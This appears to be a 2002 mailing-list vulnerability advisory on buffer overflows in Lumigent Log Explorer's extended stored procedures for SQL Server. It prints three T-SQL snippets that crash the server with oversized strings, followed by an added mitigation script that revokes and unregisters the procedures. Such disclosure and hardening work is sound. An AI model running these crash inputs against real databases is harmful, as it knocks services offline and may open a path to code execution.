Lumigent Log Explorer 3.xx extended stored procedures buffer overflow

From: martin rakhmanoff (jimmersat_private)
Date: Fri Jun 14 2002 - 06:05:15 PDT


    
    Lumigent Log Explorer is a transaction log explorer for Microsoft SQL 
    Server 7/2000. It ships with extended stored procedures implemented in 
    xp_logattach.dll. Some of them suffer from buffer overflows that lead to 
    a SQL Server service crash and potentially to arbitrary code execution. 
    Below is sample code that crashes SQL Server:
    
    declare @bo varchar(8000) 
    set @bo = replicate('A', 800) 
    exec xp_logattach_StartProf @bo 
    
    declare @bo varchar(8000) 
    set @bo = replicate('A',800) 
    exec xp_logattach_setport @bo 
    
    declare @bo varchar(8000) 
    set @bo = replicate('A',800) 
    exec xp_logattach @bo 
    
    The procedures can be run only by dbo (master) by default. The vendor was 
    informed, but I got no response confirming this problem and no fixes.
    
    Cheers
    
    Martin Rakhmanoff (jimmers)
    jimmersat_private
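
A defensive check to go with the advisory, added here and not part of the original post: it lists the extended stored procedures registered from xp_logattach.dll, shows who holds permissions on the three procedures named above, and unregisters them. It assumes the SQL Server 7/2000 system tables and that the procedures are registered in master under the names used in the post.

```sql
-- Added example, not from the original advisory. Run as a sysadmin.
USE master
GO

-- 1. Find every extended stored procedure backed by xp_logattach.dll.
--    For xtype = 'X' objects, syscomments.text holds the DLL name.
--    The post names three procedures; this also surfaces any others
--    registered from the same DLL.
SELECT o.name                   AS xp_name,
       SUBSTRING(c.text, 1, 255) AS dll,
       o.crdate                 AS registered_on
FROM   dbo.sysobjects  o
JOIN   dbo.syscomments c ON c.id = o.id
WHERE  o.xtype = 'X'
  AND (o.name LIKE 'xp[_]logattach%' OR c.text LIKE '%xp[_]logattach%')
ORDER  BY o.name
GO

-- 2. Check whether EXECUTE has been granted beyond the default.
--    sp_helprotect raises error 15330 ("no matching rows") when no
--    explicit permissions exist, which is the expected default state.
EXEC sp_helprotect 'xp_logattach_StartProf'
EXEC sp_helprotect 'xp_logattach_setport'
EXEC sp_helprotect 'xp_logattach'
GO

-- 3. Remove any grant to public that step 2 reported.
REVOKE EXECUTE ON dbo.xp_logattach_StartProf FROM public
REVOKE EXECUTE ON dbo.xp_logattach_setport   FROM public
REVOKE EXECUTE ON dbo.xp_logattach           FROM public
GO

-- 4. With no vendor fix available, unregister the procedures so the
--    DLL code is no longer reachable from T-SQL. Product features that
--    call them stop working until they are re-registered with
--    sp_addextendedproc.
EXEC sp_dropextendedproc 'xp_logattach_StartProf'
EXEC sp_dropextendedproc 'xp_logattach_setport'
EXEC sp_dropextendedproc 'xp_logattach'
GO
```

Permission changes in step 3 do not restrict sysadmin members or dbo in master, so step 4 is the only one that removes the crash path for those principals.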
    


